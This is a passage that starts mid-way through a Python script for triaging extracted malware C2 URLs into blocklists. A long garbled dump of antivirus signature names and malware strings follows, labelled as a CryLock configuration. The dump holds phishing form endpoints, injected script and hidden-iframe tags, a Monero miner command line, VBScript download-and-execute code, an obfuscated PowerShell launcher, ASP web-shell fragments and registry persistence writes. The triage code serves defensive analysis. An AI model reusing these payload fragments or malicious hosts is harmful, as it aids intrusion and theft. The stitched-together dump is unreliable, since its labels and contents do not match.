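    if parts.scheme not in ("http", "https"):
        return "malformed"
    if host in NOT_ATTACKER_INFRA:
        return "benign"
    octets = host.rstrip(".").split(".")
    if all(o.isdigit() for o in octets) and (len(octets) < 4 or host.endswith(".")):
        return "truncated_ip"        # e.g. "31.192.210." cut mid-octet
    if "." not in host or host.endswith(".") or host.startswith("."):
        return "malformed"           # "gg", "www.", "darkside"
    return "candidate"

def triage_c2_list(config):
    """Bucket every entry of the extracted list by what it really is."""
    buckets = {}
    for url in config["C2 list"]:
        buckets.setdefault(classify(url), []).append(url.strip())
    return buckets

def blocklist_hosts(config):
    """Hosts from the candidate bucket only, split by the control that would
    consume them: Tor exit policy, IP blocklist, DNS sinkhole."""
    out = {"onion": set(), "ip": set(), "domain": set()}
    for url in triage_c2_list(config).get("candidate", []):
        host = urlsplit(url).hostname
        try:
            ipaddress.ip_address(host)
            out["ip"].add(host)
        except ValueError:
            out["onion" if host.endswith(".onion") else "domain"].add(host)
    return out

if __name__ == "__main__":
    for bucket, urls in sorted(triage_c2_list(PONY_CONFIG).items()):
        print(f"{bucket}: {len(urls)}")
    print(blocklist_hosts(PONY_CONFIG))
```

Even the candidate bucket is only a starting point: `cicahroti.blogspot.com` is a page on a shared platform, so the path rather than the host is the indicator, and a hit on such an entry needs the rest of the report (the Snort alert, the SMTP exfiltration in the AgentTesla configuration) before it is treated as confirmed C2.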

Threatname: Metasploit

{"Type": "Execute Command", "Command": "\u0001"}

Threatname: CryLock

{"Extensions": "dpost cal ed, module handle  c:\\temp\\co kies.log WantRele !Trickbot.AAA!sms !Trickbotpw.A!mod Grab_Passwords_Chrome(0) Grab_Passwords_Chrome() success Grab_Passwords_Chrome(): Can't open database \\Google\\Chrome\\User Data\\Default\\Login Data.bak [Reflection.Assembly]::LoadFile(\"$binpath\\KeePass.exe\") Write-warning \"Unable Load KeePass Binarys\" Internet Explorer Internet Explorer] !Trickbotem.A!mod Grabbed %s from Inbox Grabbed %s from Contacts Error hiding Outlook from the taskbar Hide Outlook from system tray StartOutlook(): before hide c:\\temp\\mail.log StartOutlook(): ShellExecuteW()  %S %S StartOutlook(): ShellExecuteW()  %S %S] !TrickBot.I!MTB !TrickBot.J!MTB XYXEQX8dMYWKgX8KMNQpqCL \tgMofH.dll !Control !ControlFreeBufferReleaseStart !TrickBot.K!MTB Xvaultcli.dll SysListView32 atl.dll SRVDATA.dll NetServerStart NetServerStop JSRVDATA.dllControlFreeBufferNetServerStartNetServerStopReleaseStart !Trickbot.V!ibt +VC20XC00U Trojan:Win64/TrickInj.A!MTB inj_64.dll [INIT] Inj = %u [INIT] BC = %u [INIT] Proxy = %u #pgid# #pgid#] !TrickBot.A!ibt \\rdpscan.pdb  Control  ControlFreeBufferReleaseStart] TrojanDownloader:O97M/Emotet.QAZ!MTB $TrojanDownloader:O97M/Emotet.QAZ!MTB TrojanDownloader:O97M/Emotet.RAA!MTB $TrojanDownloader:O97M/Emotet.RAA!MTB TrojanDownloader:O97M/Emotet.RAB!MTB $TrojanDownloader:O97M/Emotet.RAB!MTB !Trickbotspr.A!mod CmainSpreader::init() CreateThread, error code %i CmainSpreader::init() CreateEvent, error code %i WormShare lsass.exe End of Romance spreader with module handle 0x%08X is started spreader with module handle 0x%08X is started] !TrickInj.B!MTB inj_32.dll #gid# /QConnection !EmotetCrypt.MR!MTB Trojan:Win64/Trickbot.SS!MTB dllor.dll bEjvvgF7zLSVe7I SKe1E7e1BJnWQG 0qjqOSdonoe2dLUW !ControlFreeBufferReleaseStart] TrojanDownloader:O97M/IcedID.YJ!MTB #TrojanDownloader:O97M/IcedID.YJ!MTB !Trickbot.PN!MSR rdpscan.dll rdpscan.pdb rdpscan.pdb] Behavior:Win32/Trickbot.A!sms !Trickbot.A!sms !Trickbot.B!ibt 
\\webinject32.pdb \\webinject62.pdb ControlFreeBufferReleaseStart WebInject build %s %s (%s) starting STATIC FAKE rebuild= Injection failure process pid = CheckAndInjectExplorer(): CreateToolhelp32Snapshot(): Chrome is zombie Starting and injecting chrome [INJECT] inject_via_remotethread_wow64 [INJECT] inject_via_remotethread_wow64] !Trickbot.N grab_passwords_chrome() )from logins where blacklisted_by_user = 0 \\default\\login data.bak mimikatz] !Trickbot.O [reflection.assembly]::loadfile(\"  \\keepass.exe\") MTIzNA==; cXdlcg==; MTIzNA==; cXdlcg==;] !TrickbotVP.A!MTB vpnDll build %s %s started VPN bridge failure 11:43 vpnDll.dll WantRelease RasGetConnectStatusA] !Azurlt!MTB U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs SetEnvironmentVariableW CreateProcessAsUserW GlobalMemoryStatus SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA== GDIScreenShot CryptReleaseContext CryptUnprotectData PVAULT_CRED8 Process32NextW uFileFinderU uIE7_decodeU ShellExecuteExW GetLogicalDriveStringsA InternetCrackUrlA HttpAddRequestHeadersA Browsers\\Cookies Browsers\\Cookies] Trojan:Win64/Trickrdp.A!MTB BotID trybrute rdp/names rdp/dict rdp/over rdp/freq rdp/domains rdp/domains] Trojan:Win64/Trickrdp.B!MTB F:\\rdpscan\\Bin\\Release_logged\\x64\\rdpscan.pdb !OceanLotus.AC!MTB 977Lp Trojan:HTML/Phish.JAD!MTB <formaction=http://tenillar.com/ko/pos.phpmethod=post> 8<formaction=http://tenillar.com/ko/pos.phpmethod=post> <formaction=http://185.236.231.209/xcel/copy/xel.phpmethod=post> B<formaction=http://185.236.231.209/xcel/copy/xel.phpmethod=post> <formclass=\"modal-contentanimate\"method=\"post\"action=\"http://185.236.231.210/test/en/dsf.php\"> `<formclass=\"modal-contentanimate\"method=\"post\"action=\"http://185.236.231.210/test/en/dsf.php\"> Behavior:Win32/SvchostInject.B Behavior:Win32/WermgrInject.A .@\t Xp .@  Xp Exploit:O97M/CVE-2017-0199.YAB!MTB \"Exploit:O97M/CVE-2017-0199.YAB!MTB 
target=\"http://tsdyprivatecloudshareandfileprotectsyta.ydns.eu/receipt/invoice_141140.doc\"targetmode=\"external ptarget=\"http://tsdyprivatecloudshareandfileprotectsyta.ydns.eu/receipt/invoice_141140.doc\"targetmode=\"external TrojanDownloader:O97M/Emotet.RAC!MTB $TrojanDownloader:O97M/Emotet.RAC!MTB Trojan:Win64/Trickbot.A!mod rdpscan.dllControlFreeBufferReleaseStart] Trojan:Win64/TrickbotMshare.A!MTB !Trojan:Win64/TrickbotMshare.A!MTB 7c8DhxWXjErT7C/z7ce 4Pj+/D9oJP4ZJDyoG2j+/D9oJc7qG2j1JD4MuLYLIE+oVg5 PDPqIPj+/D9oJGjcIG4Lswjo IgYMmw4d/CWzmw9a IgYMmw4d/CWzmw9a] Ransom:Win32/CerberCrypt.SU!MTB Trojan:PDF/Phish.SK!MSR !Trickbot.SV!MTB MoveLeft Release] Trojan:PDF/Phish.VT!MSR Stelega.AS!MTB Behavior:Win32/Pacalau.A Behavior:Win32/Rawanpec.A @$^O3 Trojan:Win64/Trickbot.SE !Trickbot.AAB !Trickbot.AAB&@ \"X7fv dllControlFreeBuffer ReleaseStart .dllControlFr eBuffer eBufferNetServerStartNetServerStopReleaseStart Backwar .dllBackwar Forward Pause ControlForwardFreeBufferPauseReleaseReverse ControlCreateInstanceF eeBuffer eeBufferReleaseStart ?Stop@@ .dll?Stop@@ .dllControlFreeBuffer OnLoad OnUnload OnUnloadReleaseStart ?DLLControl@@@@ .dllControl?DLLControl@@@@ ?DLLFreeBuffer@@ 0?DLLFreeBuffer@@ ?DLLRelease@@ 0?DLLRelease@@ ?DLLStart@@ 0?DLLStart@@ @FreeBufferRelease ?Find@@Y ?Init@@Y ?Shutdown@@Y _Control@ .dll_Control@ _FreeBuffer@ _Release@ _Start@ ?ReleaseA@@Y .dllControlFreeBufferRelease?ReleaseA@@Y .dll?ReleaseA@@Y AboutDialogP .dllAboutDialogP ocControlDllRegisterServerDll nregisterServer JNI_OnLoad JNI_OnUnload nregisterServerFreeBufferJNI_OnLoadJNI_OnUnloadReleaseStart !Trickbot.ZC core-parser.dll BanRule ClearRules ConfigInitDpost ConfigInitDynamic ConfigInitStatic EnumDpostServer core-parser.dllBanRuleClearRulesConfigInitDpostConfigInitDynamicConfigInitStaticEnumDpostServer /rcrd/ /getq/ /snapshoot/ /rcrd//getq//snapshoot/ Behavior:Win32/TrickBot.B!nri !Invacert.A!MSR !Trickbot.ZD F:\\Projects\\WebInject\\bin\\x86\\Release_logged\\payload32.pdb Payload 
(build %s %s) injected D$LDS D$QY3 !Xtrat!MSR  Ea.,g Behavior:Win32/BDNS.S @ %program_files% Behavior:Win32/BDNS.R Behavior:Win32/BDNS.X SuspUnixReShellCmd.O /bin/ AGamarue !Gamaure !Nivdort.DH watch_dog_name.exe /index.php?data= ADRIANCOPILULMINUNESIFLORINSALAM ADRIANCOPILULMINUNESIFLORINSALAM] !Obfuscator.TX s=\"\"dimnn=0dimnnnn=\" cs=\"\"dimnn=0dimnnnn=\" \"dountiln=len(m)n=n+1s=s&chrw(ascw(mid(m,n,1))-&h9000+len(nn))loopexecutes !Obfuscator.TY Behavior:Win32/EdgeInjectBlock.A . Behavior:Win32/EdgeInjectBlock.A Rdpbrute.A !Hagcons.A 'CcZ\tm q2m:? i?/ag^ i?3Vq i?m:? =|+5` 6jFSlL !Dinolap!rfn !Injector.BH!bit Injector.II!bit CreateDecryptorTransformFinalBlock System.Reflection.Assembly !Posokap.A!bit KAPTOXA oscan process with pid for kartoxa \\mmon.pdb !Genmaldow.A!bit C:\\Program Files\\Cmd Files\\ img.syuan.net/forum/ MyAppByMulinB ExeProcesstest server.dat !Injecter MineBicoin.Y minerd-acryptonight-ostratum+tcp://mine.moneropool.org:80-u463rxdz7msmsodw Lminerd-acryptonight-ostratum+tcp://mine.moneropool.org:80-u463rxdz7msmsodw !Banload.BGC content-na.drive.amazonaws.com/cdproxy/templink/ ://cl.ly/ WshShell.Run chr(34) & \" .exe\" & Chr(34),0 !Miniduke!rfn !Spiliwan!rfn !Cuffahlt.C hostf shdnf cachf noncf cmdrf Uflooder.A!bit UDP_Flood Start Attack Eternals UDP Flood !Twexag.B @ \":data=split(data,\"h\")(1):subsavefile(fname,str):dimtemp:setxmldoc=createobject(\"microsoft.xmldom\"):xmldoc.loadxml\"<?xmlversion=\"\"1.0\"\"?>\":setpic=xmldoc.createelement(\"pic\"):pic.datatype=\"bin.hex\":pic.nodetypedvalue=str:temp=pic.nodetypedvalue:withcreateobject(\"adodb.stream\"):.type=1:.open:.writetemp:.savetofilefname,2:.close:endwith:endsub:setws=createobject(\"wscript.shell\"):fn=ws.expandenvironmentstrings(\"%temp%\")&\"\\tmp.exe\": Ransom:Win32/Empercrypt.A schtasks.exe /delete /TN uac /F 0YOUR PERSONAL INFORMATION ARE ENCRYPTED by 7ev3n *bcdedit /set {current} recoveryenabled off dblockchain.info/api/receive?method=create&address= FILES_BACK.txt 
4?SSTART=true&CRYPTED_DATA= \"fgate.php?RIGHTS= !Doedlid !Banload.BGD !Tacpud.A RWQEq Disable_All [RCon]| [New]| [Rcon]| [Done]| [Move]| [TCP]| [UDP]|  [HTT]| [Wait]|  Open !Nivdort.DI Trojan:Win64/MineBicoin.Y !MineBicoin.Y !Itagomoko.A !Itagomoko.A]@ |<\tts O>YmE6 |Sc0vA7 _GV!{ Backdoor:Win64/Kenoja.A AAxpergle.CH U?\"\\x 0-9a-f\":\" a-z+=( 0-9+?\" !Pizwin.A ARedirector.QA .useragent;varb3p3f=0;if(nsd5ik.indexof(\"\\u0057in\\x64ows\")==-1||(nsd5ik.indexof(\"msi\\u0045\")==-1&&nsd5ik.indexof(\"\\u0047ec\\u006bo/\")==-1&&nsd5ik.indexof(\"trid\\u0065n\\u0074\")==-1)){return0;}try{try{if(demsfw(jcvjp4p)==od4rg9){returnfalse;}}catch(rdwfb9t){};if(nsd5ik.indexof(\"ms\\x49e\")!=-1||nsd5ik.indexof(\"\\x54rid\\u0065nt\")!=-1){try{b3p3f=umm8qu();functionumm8qu !QQpass.CKH!bit qq.exe786464602A3F3F SendSMSActive Action=AddUser&Server= &User= !Expiro.EA!bit BAOAOOAAO !Fakeon.A!bit 1sass.exe New Folder.exe Hideprocess @Autor David Farji - Concepto 201 !Lidared !Banload.BGE !Injector.ID!bit !Injector.IE!bit !Delf.ZXX!bit !Itagomoko sn\t(,~3 !Wmfap!rfn !Coolvidoor!rfn Trojan:HTML/Redirector.FS <scriptsrc=http://w0rms.com/sayac.js> '<scriptsrc=http://w0rms.com/sayac.js> Backdoor:ASP/Ace.U onerrorresumenextsetfileso=createobject(\"script\"&byp4ss&\"ing.file\"&byp4ss&\"systemobject\")dimhead,endd,pathn,endddfolderpath=request.servervariables(\"pat\"&byp4ss&\"h_trans\"&byp4ss&\"lated\")privatefunctionparsefolder(pathstring)dimlicountifright(pathstring,1)=\"\\\"thenparsefolder=pathstringelseforlicount=len(pathstring)to1step-1ifmid(pathstring,licount,1)=\"\\\"thenparsefolder=left(pathstring,licount !Itagomoko!rfn Zurten.A AIframe.ES status=location;document.write('<iframesrc=\"http://track.wwwapps-ups.com/stats/xstats.php\"width=\"0\"height=\"0\"frameborder=\"0\"></iframe>'); AQakbot.M @ shcHh hcHh]h !Pdfphish.Q !Delf.ZXZ!bit msiexec /q /i] !Uoolop.A!bit !Mkar.I!bit SOFTWARE\\Microsoft\\Mrak \\Netstart\\svchost.exe !Annia!rfn Behavior:Win32/SupTab.R -ptid= !Nivdort.DJ Banablid.A 
!Tipikit.D !Swizzor.IR !Ryknos.R !Ryknos.S !Small.FK !Opanki.AI !Opanki.AJ !Opanki.AK !Opanki.AL !Opanki.AM !Oscarbot.M !Truim.I !Prix.A !Prix.B !Hooker.P !Wootbot.BI !Spybot.AM !VB.FH !IceHack.A !Luhn.C !Banbra.Q !Utilman.A !Munzter.A !VB.WQ !Junty.A !Simple.A !Luzia.B !VB.WR !winrar.A !Lmirtool.A !Asank.A !Randex.AB FZcXy !Anarchy.A !Mescalin.A !HammerBinder.A 5HammerBinder.A !Floodsave.A !Delf.DZ http://www.universal101.com/upd x=0/ed=0/ex=1  http://aklick.info/d.php?date= 4 !Hamer.A !Hamer.B !Hamer.C !Hamer.D !Hamer.E !Hamer.F !Nilob.A !LookMSN.A !Apropo.N !Novelce.A !Novelce.B !Novelce.C !Apropo.O !Purga.A 5kmo.  k@:] !Boxed.S !Boxed.T !Expor.A !IEZones.D !Delf.FG !Wisdoor.B !Adlinks.A !VB.GH !Outbreak.C !Omefig.A !Gaobot.CZ !Gaobot.DA !Delf.TH !VB.WS !Sdnacm.A !Vasvix.A !Sadfas.A !Swizzor.CH )Atak.F !Delf.EV )Atak.I !Lookme.H !Randex.FF !Salira.A !Startpage.SC !Small.RO !Small.OL !Ciadoor.D !Small.RP !Startpage.TB !VB.B !Bilay.A ~u.\\F0` aOpenStream.I !Safq.A !Teeme.A !Veenet.A w%PYm !RPCNuke.C !VB.EI !Amitis.A !Amitis.B !Amitis.C !Faviant.A !IEZone.A !Gaobot.ZQ DS!b!b !Banco.EL !Banco.EM #Banco.EM !Outbreak.E !VB.BZ !Vidlo.H !VB.EM L(@\"] !VB.EN #VB.EL !Masteseq.F 7iF]7h`% !Masteseq.G !Masteseq.H !Masteseq.I !Masteseq.J !Masteseq.K !Adialer.FI !Masteseq.L !Baasay.A !Masteseq.M ]7`.Z\t !Masteseq.N !Masteseq.O !Masteseq.P !Masteseq.Q !Vaasay.A !Microjoin.D !Small.BT !Qaasay.A !Small.BU !Delf.FI !Dipass.A !Masteseq.R !Masteseq.S !Dipass.B !Shodi.G !CheeShodi.A #CheeShodi.A !Spybot.AP !Spybot.AQ !Spybot.AR !Spybot.AS !Small.NT !Qoologic.C !Adialer.FJ !Badrat.A z;3\t> !Badrat.B !Badrat.D !Badrat.E !Small.EA !Badrat.F !Adpower.E !Badrat.G !Laxor.A !Adialer.FK !Badrat.H !Badrat.I !Badrat.J !Banito.U !Fandool.A !Kamipeef.A !VB.GA !MedMotor.A !Totalvel.A !Small.NU !SecondThought.R !Mudrop.I !Bropia.E !Bropia.F !Bropia.G !Bropia.H !Spybot.BA !Spybot.BB !Spybot.BC !Pakes.C !Bropia.I !Spybot.AY !Bropia.J !Spybot.AZ !Gaobot.ZY !Bropia.L !Spybot.BD !Qoologic.E }1`b`& 
!Qoologic.F !Fratele.A !Fratele.B !Fratele.C !Wootbot.BK !Wootbot.BL !Wootbot.BM aClassloader.E !Bube.B !Bube.C !Meshbot.A !Bropia.N !Spybot.BJ !Bropia.O !Bropia.P !Spybot.BM !Spybot.BL !Gaobot.AAE !Joiner.AG !Small.M !Small.DE !Radmin.D !Small.PC !Delf.DA !Pino !Wootbot.BN 2-8b63-2f2291d6e56a c8d5ae9d-21af-48c2-89e0-ae60026c5ab0 c8d5ae9d-21af-48c2-89e0-ae60026c5ab0] !Blinsload.A http://lavajatowi.sslblindado.com/ 0#3http://lavajatowi.sslblindado.com/ 01.rar \\vmapp  ?0#c:\\programdata\\  !MobicArch.A !VBInject.AEJ !CVE-2015-1641 !CVE-2015-1641m@ 588%Z_ &dtsz !|+0 `fESaD GkE%;M, GkE%;M,0  %;M,g \\~ W3 JJk,wu  -eH0g  \tejhg Ransom:JS/Fakpst.A t=\"australiapost\"src=\"http:// ut=\"australiapost\"src=\"http://  .ru/ .jpg\">australiapost</td> href=\"http:// @.ru/ @.php?id= @\"_blank\">print Ransom:JS/Fakpst.B .php?id=  =\",\"\\x72\\x65\\x70\\x6c\\x61\\x63\\x65\",\"\\x6c\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\"];window[_  [0]);</script><imgheight=\"1\"width=\"1\"alt=\"\"style=\"display:none\"src=\"// !Banker.AOY r.leandro.santos2015@uol.com.br dusterifos2020@gmail.com agoraachoquevaiavisonovo@gmail.com senderenvioemail.tmp maria2089 !CVE-2015-1770 !Frosparf.A /cdn.pekalongan-kummunity.com InjectMN \\pekalongan.vbp /files/zza15.zip windows\\073CZ59.exe HackAlert Credit Cheat Pekalongan Kommuniti ARedirector.OK bytiger-m@te (bytiger-m@te <script>var_0x =[\"\\x TrojanDownloader:O97M/Donoff.P RwtpBoqn SuklNzMvdmKdHhyKrHvGvcBB hPMQQpTNoydvTmnAOlzBQZSLGHRleJO OGUXESxGLrJiHkxa, qeOtzBJemRtwnWSVq TrojanDownloader:O97M/Mektwool.A  TrojanDownloader:O97M/Mektwool.A Lib \"shell32\" Alias _  \"ShellExecuteA\" (ByVal Lib \"urlmon\" Alias _  \"URLDownloadToFileA\" (ByVal Dim UrlToDownloadAndExecute As String  UrlToDownloadAndExecute = byOut(i) = ((byIn(i) + Not bEncOrDec) Xor byKey(l)) - bEncOrDec byOut(i) = ((byIn(i) + Not bEncOrDec) Xor byKey(l)) - bEncOrDec] Craxfora.A G_NomeArqDestinoIniciar Func_Conex Func_TemOCara Func_Arroxa select guarda1 from ropeiro INSERT INTO tbl_avs values 
(@id_pc,@versao,0,0,@ggbb,0,0,0,0,0,@data) SQL5009.Smarterasp.net Evestern.exe myKey123 TrojanDownloader:O97M/Donoff.Q --8rvvj\" Environ$( StrReverse( Xor first(Temp + first((third + first(third)) Mod 254)) 7Xor first(Temp + first((third + first(third)) Mod 254)) 77Btxxl\", TrojanDownloader:O97M/Donoff.R  = NewPath & NewPath & \"\" & \"C:\\Users\\\" & NewPathe & \"\\AppData\\Local\\Temp\" & Split( S = NewPath & NewPath & \"\" & \"C:\\Users\\\" & NewPathe & \"\\AppData\\Local\\Temp\" & Split(  = LovesAllofYouLoveYour(\"xxx gHJdfh.exec(OIKJIKHJ !VBInject.AER LLLLu S@8}# TrojanDownloader:O97M/Donoff.S \"ht$tp$:/ \t\"ht$tp$:/ \"h??tt??p:/ Environ(Replace(\" , \"$\", \"\")) Replace(\"O ShellExecuteW 0&, !Taloc.H TrojanDownloader:O97M/Donoff.T .exec(obxvhKDkLL95) UnscrambleString(\"mpt\") zBzbmMmAG(0, oz8wJHIeSx8l, obxvhKDkLL95, 0, 0) \"esw.stilhplcr\" !AutInject.BY !Bunitu.M trew/1.0 200 OK ursent rsion tify\\ \\Xhardd ccess\\S rameters\\GirewallPolicy\\StandardProfile\\ !VBInject.AES CCCCu BBBBu !Banload.X =temppasta+zipfile+\"e\"+\"\"\"\"+foldername+nmfile+\"\"\"\"+\"-aoa\"+\"-p\"+pass+\"-o\"+\"\"\"\"+foldername+\"\"\"\"+\"*.exe\"+\"-r\"wshshell.run ,1,true temppasta+fcrypt(hextostring(zipfile),ch3a)+\"e\"+\"\"\"\"+foldername+fcrypt(hextostring(nmfile),ch3a)+\"\"\"\"+\"-aoa\"+\"-p\"+pass+\"-o\"+\"\"\"\"+foldername+\"\"\"\"+\"*.mkv\"+\"-r\"wshshell.run !CeeInject.GM !Banload.Y !Obfuscator.APU !Febian.A d:\\ms.txt \\bfconfig.txt BianFengBackDoorV !Obfuscator.APV !Obfuscator.APW Behavior:Win64/Lequse.A!dha Behavior:Win32/InjectedRemoteThreadSqlservr .+Behavior:Win32/InjectedRemoteThreadSqlservr Trojan:Win64/Lequse.A!dha !Padede.A SIGATTR:Win32/Padede.A&HSTR:Win32/Padede.A] .*SIGATTR:Win32/Padede.A&HSTR:Win32/Padede.A] !Kripfly.A linkzip,stemppast+nameziptpushuulinkpri,stemppast+namepristr8zip=stemppast+namezip+\"x\"+stemppast+namepri+\"-aoa\"+\"-p\"+spasswd+\"-o\"+sapppastobjwshell.runstr8zip !Obfuscator.APX Pluterdma.A 
-opuntos.exehttp://www.profwoman.ru/mp3remrenamematrix.servmatrix.exe G-opuntos.exehttp://www.profwoman.ru/mp3remrenamematrix.servmatrix.exe !Startpage.XZ !Banload.Z +M:@j Q+M:@j !Eigivef.A !Obfuscator.APZ !Banload.AA environ(chr(65)&chr(112)&chr(112)&chr(68)&chr(97)&chr(116)&chr(97))&chr(92)&chr(86)&chr(66)&chr(69)&chr(5 )iffileexists(slocalpath&chr(92))thenwscript.quitmkdirslocalpathslocalpath=slocalpath&chr(92)&randomstring(8)&chr(46)&chr(101)&chr(120)&chr(101) chr(104)&chr(116)&chr(116)&chr(112) !Banload.AB =wscript.createobject(\"wscript.shell\")dimappdatawin7=objwshell.expandenvironmentstrings(\"%appdata%\")winxp=objwshell.expandenvironmentstrings(\"%windir%\\system32\")a0218367812b\"ht !CeeInject.gen!LG Dolphtoob.A eE*mw U6I775B3XVykqfxRtyePbA== Dolphin Boot - Coded For Dolphin Protector /c echo [zoneTransfer]ZoneID = 2 > pchealth.exe UrlAssociations\\http\\UserChoice 4hrfienz.rfk.dll !Banload.AC regsvr32.exe/s\":savebinarydatabinarygeturl(surl&\"c.html\"),snomeimg:objwshell.runscamaro&smonza&snomeimg&smonza&ssenha wregsvr32.exe/s\":savebinarydatabinarygeturl(surl&\"c.html\"),snomeimg:objwshell.runscamaro&smonza&snomeimg&smonza&ssenha !Olutall AMeadgive.V Exploit:HTML/Meadgive.N !Obfuscator.AQA !VBInject.AEQ !Upatre.CD > gL] !CeeInject.GN !Injector.GW TrojanDownloader:O97M/Kriof.A -window hidden -enc Critical Microsoft Office Error JAAxACAAPQAgACcAJABjACAAPQAgAC Ransom:HTML/Tescrypt j,k-+ Bartallex.M  As Integer) )  & \"om/w\" & \"p-includes/theme-compat/\" (ATTH + STT1 + LNSS) Behavior:Win32/DnsTamperLib !OnionDuke.A!dha !OnionDuke.C!dha upload_slowdown_ms: master_slave_policy: post_per_request_limit_kb: local_limit_mb: mycert: hex( - arg: campaign_id !OnionDuke.B!dha !OnionDuke!dha Nagoot.A I=M>\t] !Worqid.A !Upatre.CE !Banker.AOZ !AutInject.BZ :.iI7 !Seepeldown.D !VBInject.AET !Obfuscator.AQC !Brucryp O+P3f85OR !Startpage.YH !Alucple !Codbot fGLOBAL CONST $DVD_FILE_ROOTPATH = \"autorun\\autorun. 
GLOBAL CONST $DENY_PROCESS_LIST = STRINGSPLIT ( \"Burn|nero|clone|iso|dvd|cd|alc|bw|taskmgr\" , \"|\" ) GLOBAL CONST $DENY_WINDOWS_LIST = STRINGSPLIT ( \"Ashampoo Burning Studio|Alcohol 120|Alcohol 52\" , \"|\" ) REGWRITE ( \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" , \"NETLib\" , \"REG_SZ\" , @SCRIPTFULLPATH ) #NoTrayIcon #RequireAdmin] !Weebu.A !Obfuscator.AQB !Obfuscator.AQD Ffloq.A set_Expect100Continue Firefox.Resources.resources ConfuserEx v0. ConfuserEx v0.g Katara.A Tectizo.A Subti.G /c reg add \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\W !Slackbot.D p8eJ* )Gopworm.A )Heyya.A )Skybag.B B_T(y )Torvil.D !Blaxe.A !Bomka.A !VB.ZS !VB.ES !Delf.HN !Bancos.ID !Banker.UJ !VB.ANO !Banker.DER !Bomka.B !VB.IF !Aimbot.BA !Amitis.D !Beastdoor.CK !Beastdoor.CL !Beastdoor.CM !Beastdoor.CN !Bifrose.DB !Bionet.F !Coldfuson.I !Delf.YU !Delf.YV !Kamikaze.A !Lithium.C !Netdevil.L !Optix.AA !Optix.AB !Optix.AC !Optix.AD !Optix.AE !Optix.AF !Optix.AG !Optix.AH !Optix.AI !Optix.AJ !Winshell.G !Winshell.H !Winshell.I !Winshell.J !Winshell.K !Eliterab.B l,+K@ !Madtol.G !Delf.KV ,taWi !VB.WJ !VB.WK !WarSpy.G !Bancos.IF !Delf.GY !Scane.A !Tuim.D !Tuim.E !Smuma.B !Smuma.A !Mulod.A !Yiha.A !Bifrose.B !Feardoor.L !Sfind.B !Frusion.A !Ducky.A !PWSteal.D !Zinflow.A aFURootkit.A do'MK c0\\Q}s&G !VB.WA !Aflooder.A !VB.WB !VB.K !PcClient.C !Aflooder.B !ProcKiller.A !VB.WC !Delf.RJ !Small.VL !Sennaspy.2000 !Funner.A !Recto.A !Small.VN !Small.VO !VB.WD !Small.AF r aiE !Gaobot.ZG !Small.VR !VB.BU !VB.WE !Small.AG !Splitu.A !Tuim.G !Tuim.H 5P1):v !Lmir.QW !Small.BV Maxload.A V/e ] )Mywife.G !Protoride.AD !Bancos.BH !Randex.FD !Gaobot.ZH !Dcom.BX !Banbra.R !Small.LS !Delf.FE !Bancos.BK Provider=SQLOLEDB.1;Password= javascript:enviaUrl Enviarpgina Windows messenger javascript:cadastroSenhas() \\liberaplug.log !Delf.SC !DcomScan.A !Small.MI !Small.MK !Small.ML !Bancos.BL !Wootbot.CR !Startpage.PS !Small.MM !Gaobot.ZK !Small.MO !Inof.A !Small.MQ !Banbra.Z 
!Small.MS \t7t!\") !Small.MT !Triject.A !Bifrose.E !Spybot.AO !Small.MU !Delf.FH !Small.MV !Adfram.B !Small.MW !Adfram.C !Adfram.D aClassloader.D !Adfram.A >c@lf !Pekax.A !Spuid.A !Smym.A )Mugly.C !NetexScan.A !SynFlood.F !Small.MX !Gaobot.ZL !Gaobot.ZM !Banbra.AA !Small.BW !Small.MZ !WebSearch.C !Webber.L !Delf.FF qEeg& !Hidproc.A !Small.NA >dM,G !AdSearch.A !AdSearch.B !Winad.B !Protoride.AF !Small.MY !NetexScan.B +Klez.H@mm !Small.NB !VB.DX !Startpage.PW !Outbreak.D !Small.NC !Startpage.PV !Small.B !Small.AL h<[ g/\\ !Small.AM !Small.AN !Banbra.AB !Startpage.PX !Adialer.FE !Adialer.FF !Adialer.FG !VB.DY !Small.BZ !Killfiles.FI !Killwin.W !Primativ.A !Zalim.A !Small.AO !Small.AP !Small.CN !Small.NP !Small.NQ !Zalim.B !Small.L !Berbew.CN !Berbew.CO !Banker.FO !Small.NR !Small.CO Behavior:Win32/Dirtvanontufo.A!nri .\"Behavior:Win32/Dirtvanontufo.A!nri Behavior:Win32/Solorabbit.B!nri Behavior:Win32/MZPEMemoryArtifacts.D .$Behavior:Win32/MZPEMemoryArtifacts.D !Chadivendo.STA Global\\ !Chadivendo.STB !Chadivendo.STC Pjjjjjjjh DebugBreak \\Temp\\edg AgentTesla.OXAR!MTB AgentTesla.OXAS!MTB Trojan:PDF/Phish.RRE!MTB Behavior:Win32/SuspMshtaLaunch.B . Behavior:Win32/SuspMshtaLaunch.B Behavior:Win32/RegWriteScript.A PP\t@/L\\microsoft\\windows\\currentversion\\run vbscript:execute Behavior:Win32/RegWriteScript.B PP\t@4 hkcu\\software  test-connection Puntil Exploit:O97M/CVE-2017-11882.HZ!MTB \"Exploit:O97M/CVE-2017-11882.HZ!MTB @ !Chadivendo.STD ServiceDll wwlib.dll Psc start \"%s\" f2032.com \tf2032.com Worm:AndroidOS/Goodnews.B!MTB Lcom/chodukaka/isporban StartAppAd  getSubId You need to click on Ad to Continue. $You need to click on Ad to Continue. To start Tiktok, follow next steps \"To start Tiktok, follow next steps Click on Next Button to continue  Click on Next Button to continue http://tiny.cc/Tiktok-Pro Share this APP on Whatsapp groups 10 Times.\\nto Start Tiktok. =Share this APP on Whatsapp groups 10 Times.\\nto Start Tiktok. 
